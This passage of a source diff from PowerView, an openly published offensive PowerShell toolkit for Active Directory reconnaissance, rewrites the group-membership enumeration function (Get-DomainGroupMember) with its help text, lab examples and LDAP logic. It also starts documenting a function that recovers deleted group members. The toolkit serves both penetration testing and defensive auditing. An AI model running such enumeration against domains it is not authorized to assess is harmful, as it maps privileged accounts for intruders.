+ # Write-Host "GroupManager: $GroupManager"
+ $ManagedGroup = New-Object PSObject
+ $ManagedGroup | Add-Member Noteproperty 'GroupName' $_.samaccountname
+ $ManagedGroup | Add-Member Noteproperty 'GroupDistinguishedName' $_.distinguishedname
+ $ManagedGroup | Add-Member Noteproperty 'ManagerName' $GroupManager.samaccountname
+ $ManagedGroup | Add-Member Noteproperty 'ManagerDistinguishedName' $GroupManager.distinguishedName
+
+ # determine whether the manager is a user or a group
+ if ($GroupManager.samaccounttype -eq 0x10000000) {
+ $ManagedGroup | Add-Member Noteproperty 'ManagerType' 'Group'
+ }
+ elseif ($GroupManager.samaccounttype -eq 0x30000000) {
+ $ManagedGroup | Add-Member Noteproperty 'ManagerType' 'User'
+ }
+
+ $ACLArguments = @{
+ 'Identity' = $_.distinguishedname
+ 'RightsFilter' = 'WriteMembers'
+ }
+ if ($PSBoundParameters['Server']) { $ACLArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $ACLArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $ACLArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $ACLArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $ACLArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $ACLArguments['Credential'] = $Credential }
+
+ # # TODO: correct!
+ # # find the ACLs that relate to the ability to write to the group
+ # $xacl = Get-DomainObjectAcl @ACLArguments -Verbose
+ # # $ACLArguments
+ # # double-check that the manager
+ # if ($xacl.ObjectType -eq 'bf9679c0-0de6-11d0-a285-00aa003049e2' -and $xacl.AceType -eq 'AccessAllowed' -and ($xacl.ObjectSid -eq $GroupManager.objectsid)) {
+ # $ManagedGroup | Add-Member Noteproperty 'ManagerCanWrite' $True
+ # }
+ # else {
+ # $ManagedGroup | Add-Member Noteproperty 'ManagerCanWrite' $False
+ # }
+
+ $ManagedGroup | Add-Member Noteproperty 'ManagerCanWrite' 'UNKNOWN'
+
+ $ManagedGroup.PSObject.TypeNames.Insert(0, 'PowerView.ManagedSecurityGroup')
+ $ManagedGroup
}
+ }
+}
+
+
+function Get-DomainGroupMember {
+<#
+.SYNOPSIS
+
+Return the members of a specific domain group.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Get-DomainGroup, Get-DomainGroupMember, Convert-ADName, Get-DomainObject, ConvertFrom-SID
+
+.DESCRIPTION
+
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for the specified
+group matching the criteria. Each result is then rebound and the full user
+or group object is returned.
+
+.PARAMETER Identity
+
+A SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)
+specifying the group to query for. Wildcards accepted.
+
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
+
+.PARAMETER Recurse
+
+Switch. If the group member is a group, recursively try to query its members as well.
+
+.PARAMETER RecurseUsingMatchingRule
+
+Switch. Use LDAP_MATCHING_RULE_IN_CHAIN in the LDAP search query to recurse.
+Much faster than manual recursion, but doesn't reveal cross-domain groups,
+and only returns user accounts (no nested group objects themselves).
+
+.PARAMETER LDAPFilter
+
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+.PARAMETER SearchBase
+
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
- # so this isn't repeated if users are passed on the pipeline
- $GroupSearcher = Get-DomainSearcher -Domain $TargetDomain -DomainController $TargetDomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize
+.PARAMETER SearchScope
+
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER SecurityMasks
+
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Get-DomainGroupMember "Desktop Admins"
+
+GroupDomain : testlab.local
+GroupName : Desktop Admins
+GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : Testing Group
+MemberDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local
+MemberObjectClass : group
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1129
+
+GroupDomain : testlab.local
+GroupName : Desktop Admins
+GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : arobbins.a
+MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112
+
+.EXAMPLE
+
+'Desktop Admins' | Get-DomainGroupMember -Recurse
+
+GroupDomain : testlab.local
+GroupName : Desktop Admins
+GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : Testing Group
+MemberDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local
+MemberObjectClass : group
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1129
+
+GroupDomain : testlab.local
+GroupName : Testing Group
+GroupDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : harmj0y
+MemberDistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1108
+
+GroupDomain : testlab.local
+GroupName : Desktop Admins
+GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : arobbins.a
+MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112
+
+.EXAMPLE
+
+Get-DomainGroupMember -Domain testlab.local -Identity 'Desktop Admins' -RecurseUingMatchingRule
+
+GroupDomain : testlab.local
+GroupName : Desktop Admins
+GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : harmj0y
+MemberDistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1108
+
+GroupDomain : testlab.local
+GroupName : Desktop Admins
+GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : arobbins.a
+MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112
+
+.EXAMPLE
+
+Get-DomainGroup *admin* -Properties samaccountname | Get-DomainGroupMember
+
+.EXAMPLE
+
+'CN=Enterprise Admins,CN=Users,DC=testlab,DC=local', 'Domain Admins' | Get-DomainGroupMember
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGroupMember -Credential $Cred -Identity 'Domain Admins'
+
+.EXAMPLE
+
+Get-Domain | Select-Object -Expand name
+testlab.local
+
+'dev\domain admins' | Get-DomainGroupMember -Verbose
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: [Get-DomainGroupMember] Extracted domain 'dev.testlab.local' from 'dev\domain admins'
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: [Get-DomainGroupMember] Get-DomainGroupMember filter string: (&(objectCategory=group)(|(samAccountName=domain admins)))
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(distinguishedname=CN=user1,CN=Users,DC=dev,DC=testlab,DC=local)))
+
+GroupDomain : dev.testlab.local
+GroupName : Domain Admins
+GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local
+MemberDomain : dev.testlab.local
+MemberName : user1
+MemberDistinguishedName : CN=user1,CN=Users,DC=dev,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-339048670-1233568108-4141518690-201108
+
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(distinguishedname=CN=Administrator,CN=Users,DC=dev,DC=testlab,DC=local)))
+GroupDomain : dev.testlab.local
+GroupName : Domain Admins
+GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local
+MemberDomain : dev.testlab.local
+MemberName : Administrator
+MemberDistinguishedName : CN=Administrator,CN=Users,DC=dev,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-339048670-1233568108-4141518690-500
+
+.OUTPUTS
+
+PowerView.GroupMember
+
+Custom PSObject with translated group member property fields.
+
+.LINK
+
+http://www.powershellmagazine.com/2013/05/23/pstip-retrieve-group-membership-of-an-active-directory-group-recursively/
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
+ [OutputType('PowerView.GroupMember')]
+ [CmdletBinding(DefaultParameterSetName = 'None')]
+ Param(
+ [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]
+ [String[]]
+ $Identity,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Domain,
+
+ [Parameter(ParameterSetName = 'ManualRecurse')]
+ [Switch]
+ $Recurse,
+
+ [Parameter(ParameterSetName = 'RecurseUsingMatchingRule')]
+ [Switch]
+ $RecurseUsingMatchingRule,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
+ [String]
+ $LDAPFilter,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
+ [String]
+ $SearchBase,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
+
+ [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
+ [String]
+ $SecurityMasks,
+
+ [Switch]
+ $Tombstone,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ BEGIN {
+ $SearcherArguments = @{
+ 'Properties' = 'member,samaccountname,distinguishedname'
+ }
+ if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter }
+ if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+
+ $ADNameArguments = @{}
+ if ($PSBoundParameters['Domain']) { $ADNameArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Server']) { $ADNameArguments['Server'] = $Server }
+ if ($PSBoundParameters['Credential']) { $ADNameArguments['Credential'] = $Credential }
}
- process {
+ PROCESS {
+ $GroupSearcher = Get-DomainSearcher @SearcherArguments
if ($GroupSearcher) {
- if ($Recurse -and $UseMatchingRule) {
- # resolve the group to a distinguishedname
- if ($GroupName) {
- $Group = Get-NetGroup -AllTypes -GroupName $GroupName -Domain $TargetDomain -DomainController $TargetDomainController -Credential $Credential -FullData -PageSize $PageSize
- }
- elseif ($SID) {
- $Group = Get-NetGroup -AllTypes -SID $SID -Domain $TargetDomain -DomainController $TargetDomainController -Credential $Credential -FullData -PageSize $PageSize
- }
- else {
- # default to domain admins
- $SID = (Get-DomainSID -Domain $TargetDomain -DomainController $TargetDomainController) + "-512"
- $Group = Get-NetGroup -AllTypes -SID $SID -Domain $TargetDomain -DomainController $TargetDomainController -Credential $Credential -FullData -PageSize $PageSize
- }
- $GroupDN = $Group.distinguishedname
- $GroupFoundName = $Group.samaccountname
+ if ($PSBoundParameters['RecurseUsingMatchingRule']) {
+ $SearcherArguments['Identity'] = $Identity
+ $SearcherArguments['Raw'] = $True
+ $Group = Get-DomainGroup @SearcherArguments
- if ($GroupDN) {
- $GroupSearcher.filter = "(&(samAccountType=805306368)(memberof:1.2.840.113556.1.4.1941:=$GroupDN)$Filter)"
- $GroupSearcher.PropertiesToLoad.AddRange(('distinguishedName','samaccounttype','lastlogon','lastlogontimestamp','dscorepropagationdata','objectsid','whencreated','badpasswordtime','accountexpires','iscriticalsystemobject','name','usnchanged','objectcategory','description','codepage','instancetype','countrycode','distinguishedname','cn','admincount','logonhours','objectclass','logoncount','usncreated','useraccountcontrol','objectguid','primarygroupid','lastlogoff','samaccountname','badpwdcount','whenchanged','memberof','pwdlastset','adspath'))
-
- $Members = $GroupSearcher.FindAll()
- $GroupFoundName = $GroupName
+ if (-not $Group) {
+ Write-Warning "[Get-DomainGroupMember] Error searching for group with identity: $Identity"
}
else {
- Write-Error "Unable to find Group"
+ $GroupFoundName = $Group.properties.item('samaccountname')[0]
+ $GroupFoundDN = $Group.properties.item('distinguishedname')[0]
+
+ if ($PSBoundParameters['Domain']) {
+ $GroupFoundDomain = $Domain
+ }
+ else {
+ # if a domain isn't passed, try to extract it from the found group distinguished name
+ if ($GroupFoundDN) {
+ $GroupFoundDomain = $GroupFoundDN.SubString($GroupFoundDN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+ }
+ }
+ Write-Verbose "[Get-DomainGroupMember] Using LDAP matching rule to recurse on '$GroupFoundDN', only user accounts will be returned."
+ $GroupSearcher.filter = "(&(samAccountType=805306368)(memberof:1.2.840.113556.1.4.1941:=$GroupFoundDN))"
+ $GroupSearcher.PropertiesToLoad.AddRange(('distinguishedName'))
+ $Members = $GroupSearcher.FindAll() | ForEach-Object {$_.Properties.distinguishedname[0]}
}
+ $Null = $SearcherArguments.Remove('Raw')
}
else {
- if ($GroupName) {
- $GroupSearcher.filter = "(&(objectCategory=group)(samaccountname=$GroupName)$Filter)"
+ $IdentityFilter = ''
+ $Filter = ''
+ $Identity | Where-Object {$_} | ForEach-Object {
+ $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
+ if ($IdentityInstance -match '^S-1-') {
+ $IdentityFilter += "(objectsid=$IdentityInstance)"
+ }
+ elseif ($IdentityInstance -match '^CN=') {
+ $IdentityFilter += "(distinguishedname=$IdentityInstance)"
+ if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {
+ # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname
+ # and rebuild the domain searcher
+ $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+ Write-Verbose "[Get-DomainGroupMember] Extracted domain '$IdentityDomain' from '$IdentityInstance'"
+ $SearcherArguments['Domain'] = $IdentityDomain
+ $GroupSearcher = Get-DomainSearcher @SearcherArguments
+ if (-not $GroupSearcher) {
+ Write-Warning "[Get-DomainGroupMember] Unable to retrieve domain searcher for '$IdentityDomain'"
+ }
+ }
+ }
+ elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') {
+ $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join ''
+ $IdentityFilter += "(objectguid=$GuidByteString)"
+ }
+ elseif ($IdentityInstance.Contains('\')) {
+ $ConvertedIdentityInstance = $IdentityInstance.Replace('\28', '(').Replace('\29', ')') | Convert-ADName -OutputType Canonical
+ if ($ConvertedIdentityInstance) {
+ $GroupDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/'))
+ $GroupName = $IdentityInstance.Split('\')[1]
+ $IdentityFilter += "(samAccountName=$GroupName)"
+ $SearcherArguments['Domain'] = $GroupDomain
+ Write-Verbose "[Get-DomainGroupMember] Extracted domain '$GroupDomain' from '$IdentityInstance'"
+ $GroupSearcher = Get-DomainSearcher @SearcherArguments
+ }
+ }
+ else {
+ $IdentityFilter += "(samAccountName=$IdentityInstance)"
+ }
}
- elseif ($SID) {
- $GroupSearcher.filter = "(&(objectCategory=group)(objectSID=$SID)$Filter)"
+
+ if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
+ $Filter += "(|$IdentityFilter)"
}
- else {
- # default to domain admins
- $SID = (Get-DomainSID -Domain $TargetDomain -DomainController $TargetDomainController) + "-512"
- $GroupSearcher.filter = "(&(objectCategory=group)(objectSID=$SID)$Filter)"
+
+ if ($PSBoundParameters['LDAPFilter']) {
+ Write-Verbose "[Get-DomainGroupMember] Using additional LDAP filter: $LDAPFilter"
+ $Filter += "$LDAPFilter"
}
+ $GroupSearcher.filter = "(&(objectCategory=group)$Filter)"
+ Write-Verbose "[Get-DomainGroupMember] Get-DomainGroupMember filter string: $($GroupSearcher.filter)"
try {
$Result = $GroupSearcher.FindOne()
}
catch {
+ Write-Warning "[Get-DomainGroupMember] Error searching for group with identity '$Identity': $_"
$Members = @()
}
$GroupFoundName = ''
+ $GroupFoundDN = ''
if ($Result) {
- $Members = $Result.properties.item("member")
-
- if($Members.count -eq 0) {
+ $Members = $Result.properties.item('member')
+ if ($Members.count -eq 0) {
+ # ranged searching, thanks @meatballs__ !
$Finished = $False
$Bottom = 0
$Top = 0
- while(!$Finished) {
+ while (-not $Finished) {
$Top = $Bottom + 1499
$MemberRange="member;range=$Bottom-$Top"
$Bottom += 1500
-
- $GroupSearcher.PropertiesToLoad.Clear()
- [void]$GroupSearcher.PropertiesToLoad.Add("$MemberRange")
- [void]$GroupSearcher.PropertiesToLoad.Add("samaccountname")
+ $Null = $GroupSearcher.PropertiesToLoad.Clear()
+ $Null = $GroupSearcher.PropertiesToLoad.Add("$MemberRange")
+ $Null = $GroupSearcher.PropertiesToLoad.Add('samaccountname')
+ $Null = $GroupSearcher.PropertiesToLoad.Add('distinguishedname')
+
try {
$Result = $GroupSearcher.FindOne()
$RangedProperty = $Result.Properties.PropertyNames -like "member;range=*"
$Members += $Result.Properties.item($RangedProperty)
- $GroupFoundName = $Result.properties.item("samaccountname")[0]
+ $GroupFoundName = $Result.properties.item('samaccountname')[0]
+ $GroupFoundDN = $Result.properties.item('distinguishedname')[0]
- if ($Members.count -eq 0) {
+ if ($Members.count -eq 0) {
$Finished = $True
}
}
@@ -5466,46 +10911,44 @@ function Get-NetGroupMember {
}
}
else {
- $GroupFoundName = $Result.properties.item("samaccountname")[0]
+ $GroupFoundName = $Result.properties.item('samaccountname')[0]
+ $GroupFoundDN = $Result.properties.item('distinguishedname')[0]
$Members += $Result.Properties.item($RangedProperty)
}
+
+ if ($PSBoundParameters['Domain']) {
+ $GroupFoundDomain = $Domain
+ }
+ else {
+ # if a domain isn't passed, try to extract it from the found group distinguished name
+ if ($GroupFoundDN) {
+ $GroupFoundDomain = $GroupFoundDN.SubString($GroupFoundDN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+ }
+ }
}
- $GroupSearcher.dispose()
}
- $Members | Where-Object {$_} | ForEach-Object {
- # if we're doing the LDAP_MATCHING_RULE_IN_CHAIN recursion
+ ForEach ($Member in $Members) {
if ($Recurse -and $UseMatchingRule) {
$Properties = $_.Properties
- }
+ }
else {
- if($TargetDomainController) {
- $Result = [adsi]"LDAP://$TargetDomainController/$_"
- }
- else {
- $Result = [adsi]"LDAP://$_"
- }
- if($Result){
- $Properties = $Result.Properties
- }
+ $ObjectSearcherArguments = $SearcherArguments.Clone()
+ $ObjectSearcherArguments['Identity'] = $Member
+ $ObjectSearcherArguments['Raw'] = $True
+ $ObjectSearcherArguments['Properties'] = 'distinguishedname,cn,samaccountname,objectsid,objectclass'
+ $Object = Get-DomainObject @ObjectSearcherArguments
+ $Properties = $Object.Properties
}
- if($Properties) {
-
- $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Properties.samaccounttype
-
- if ($FullData) {
- $GroupMember = Convert-LDAPProperty -Properties $Properties
- }
- else {
- $GroupMember = New-Object PSObject
- }
-
- $GroupMember | Add-Member Noteproperty 'GroupDomain' $TargetDomain
+ if ($Properties) {
+ $GroupMember = New-Object PSObject
+ $GroupMember | Add-Member Noteproperty 'GroupDomain' $GroupFoundDomain
$GroupMember | Add-Member Noteproperty 'GroupName' $GroupFoundName
+ $GroupMember | Add-Member Noteproperty 'GroupDistinguishedName' $GroupFoundDN
- if($Properties.objectSid) {
- $MemberSID = ((New-Object System.Security.Principal.SecurityIdentifier $Properties.objectSid[0],0).Value)
+ if ($Properties.objectsid) {
+ $MemberSID = ((New-Object System.Security.Principal.SecurityIdentifier $Properties.objectsid[0], 0).Value)
}
else {
$MemberSID = $Null
@@ -5513,29 +10956,29 @@ function Get-NetGroupMember {
try {
$MemberDN = $Properties.distinguishedname[0]
-
- if (($MemberDN -match 'ForeignSecurityPrincipals') -and ($MemberDN -match 'S-1-5-21')) {
+ if ($MemberDN -match 'ForeignSecurityPrincipals|S-1-5-21') {
try {
- if(-not $MemberSID) {
+ if (-not $MemberSID) {
$MemberSID = $Properties.cn[0]
}
- $MemberSimpleName = Convert-SidToName -SID $MemberSID | Convert-ADName -InputType 'NT4' -OutputType 'Simple'
- if($MemberSimpleName) {
+ $MemberSimpleName = Convert-ADName -Identity $MemberSID -OutputType 'DomainSimple' @ADNameArguments
+
+ if ($MemberSimpleName) {
$MemberDomain = $MemberSimpleName.Split('@')[1]
}
else {
- Write-Warning "Error converting $MemberDN"
+ Write-Warning "[Get-DomainGroupMember] Error converting $MemberDN"
$MemberDomain = $Null
}
}
catch {
- Write-Warning "Error converting $MemberDN"
+ Write-Warning "[Get-DomainGroupMember] Error converting $MemberDN"
$MemberDomain = $Null
}
}
else {
# extract the FQDN from the Distinguished Name
- $MemberDomain = $MemberDN.subString($MemberDN.IndexOf("DC=")) -replace 'DC=','' -replace ',','.'
+ $MemberDomain = $MemberDN.SubString($MemberDN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
}
}
catch {
@@ -5546,2200 +10989,3067 @@ function Get-NetGroupMember {
if ($Properties.samaccountname) {
# forest users have the samAccountName set
$MemberName = $Properties.samaccountname[0]
- }
+ }
else {
# external trust users have a SID, so convert it
try {
- $MemberName = Convert-SidToName $Properties.cn[0]
+ $MemberName = ConvertFrom-SID -ObjectSID $Properties.cn[0] @ADNameArguments
}
catch {
# if there's a problem contacting the domain to resolve the SID
- $MemberName = $Properties.cn
+ $MemberName = $Properties.cn[0]
}
}
+ if ($Properties.objectclass -match 'computer') {
+ $MemberObjectClass = 'computer'
+ }
+ elseif ($Properties.objectclass -match 'group') {
+ $MemberObjectClass = 'group'
+ }
+ elseif ($Properties.objectclass -match 'user') {
+ $MemberObjectClass = 'user'
+ }
+ else {
+ $MemberObjectClass = $Null
+ }
$GroupMember | Add-Member Noteproperty 'MemberDomain' $MemberDomain
$GroupMember | Add-Member Noteproperty 'MemberName' $MemberName
+ $GroupMember | Add-Member Noteproperty 'MemberDistinguishedName' $MemberDN
+ $GroupMember | Add-Member Noteproperty 'MemberObjectClass' $MemberObjectClass
$GroupMember | Add-Member Noteproperty 'MemberSID' $MemberSID
- $GroupMember | Add-Member Noteproperty 'IsGroup' $IsGroup
- $GroupMember | Add-Member Noteproperty 'MemberDN' $MemberDN
- $GroupMember.PSObject.TypeNames.Add('PowerView.GroupMember')
+ $GroupMember.PSObject.TypeNames.Insert(0, 'PowerView.GroupMember')
$GroupMember
# if we're doing manual recursion
- if ($Recurse -and !$UseMatchingRule -and $IsGroup -and $MemberName) {
- if($FullData) {
- Get-NetGroupMember -FullData -Domain $MemberDomain -DomainController $TargetDomainController -Credential $Credential -GroupName $MemberName -Recurse -PageSize $PageSize
- }
- else {
- Get-NetGroupMember -Domain $MemberDomain -DomainController $TargetDomainController -Credential $Credential -GroupName $MemberName -Recurse -PageSize $PageSize
- }
+ if ($PSBoundParameters['Recurse'] -and $MemberDN -and ($MemberObjectClass -match 'group')) {
+ Write-Verbose "[Get-DomainGroupMember] Manually recursing on group: $MemberDN"
+ $SearcherArguments['Identity'] = $MemberDN
+ $Null = $SearcherArguments.Remove('Properties')
+ Get-DomainGroupMember @SearcherArguments
}
}
}
+ $GroupSearcher.dispose()
}
}
}
-function Get-NetFileServer {
+function Get-DomainGroupMemberDeleted {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Returns information on group members that were removed from the specified
+group identity. Accomplished by searching the linked attribute replication
+metadata for the group using Get-DomainObjectLinkedAttributeHistory.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainObjectLinkedAttributeHistory
- Returns a list of all file servers extracted from user
- homedirectory, scriptpath, and profilepath fields.
+.DESCRIPTION
- .PARAMETER Domain
+Wraps Get-DomainObjectLinkedAttributeHistory to return the linked attribute
+replication metadata for the specified group. These are cases where the
+'Version' attribute of group member in the replication metadata is even.
- The domain to query for user file servers, defaults to the current domain.
+.PARAMETER Identity
- .PARAMETER DomainController
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted.
- Domain controller to reflect LDAP queries through.
+.PARAMETER Domain
- .PARAMETER TargetUsers
+Specifies the domain to use for the query, defaults to the current domain.
- An array of users to query for file servers.
+.PARAMETER LDAPFilter
- .PARAMETER PageSize
+Specifies an LDAP query string that is used to filter Active Directory objects.
- The PageSize to set for the LDAP searcher object.
+.PARAMETER SearchBase
- .PARAMETER Credential
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target domain.
+.PARAMETER Server
- .EXAMPLE
+Specifies an Active Directory server (domain controller) to bind to.
- PS C:\> Get-NetFileServer
-
- Returns active file servers.
+.PARAMETER SearchScope
- .EXAMPLE
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
- PS C:\> Get-NetFileServer -Domain testing
-
- Returns active file servers for the 'testing' domain.
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Get-DomainGroupMemberDeleted | Group-Object GroupDN
+
+Count Name Group
+----- ---- -----
+ 2 CN=Domain Admins,CN=Us... {@{GroupDN=CN=Domain Admins,CN=Users,DC=test...
+ 3 CN=DomainLocalGroup,CN... {@{GroupDN=CN=DomainLocalGroup,CN=Users,DC=t...
+
+.EXAMPLE
+
+Get-DomainGroupMemberDeleted "Domain Admins" -Domain testlab.local
+
+
+GroupDN : CN=Domain Admins,CN=Users,DC=testlab,DC=local
+MemberDN : CN=testuser,CN=Users,DC=testlab,DC=local
+TimeFirstAdded : 2017-06-13T23:07:43Z
+TimeDeleted : 2017-06-13T23:26:17Z
+LastOriginatingChange : 2017-06-13T23:26:17Z
+TimesAdded : 2
+LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First
+ -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca
+ l
+
+GroupDN : CN=Domain Admins,CN=Users,DC=testlab,DC=local
+MemberDN : CN=dfm,CN=Users,DC=testlab,DC=local
+TimeFirstAdded : 2017-06-13T22:20:02Z
+TimeDeleted : 2017-06-13T23:26:17Z
+LastOriginatingChange : 2017-06-13T23:26:17Z
+TimesAdded : 5
